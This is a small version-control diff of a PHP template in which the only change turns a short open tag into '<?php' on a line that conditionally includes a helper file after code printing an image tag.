changeset 2 | 4f3e6ea1c867 |
parent 1 | 0d28b7c10758 |
1:0d28b7c10758 | 2:4f3e6ea1c867 |
---|---|
6 |
6 |
7 if ($key!=null) { |
7 if ($key!=null) { |
8 printf('<img src="%s%s" alt="wstep"/>', $dir, $key); |
8 printf('<img src="%s%s" alt="wstep"/>', $dir, $key); |
9 } |
9 } |
10 } |
10 } |
11 ?><? if(!function_exists(amt_cif)) { require_once('functions.wp-amt.php'); } ?> |
11 ?><?php if(!function_exists(amt_cif)) { require_once('functions.wp-amt.php'); } ?> |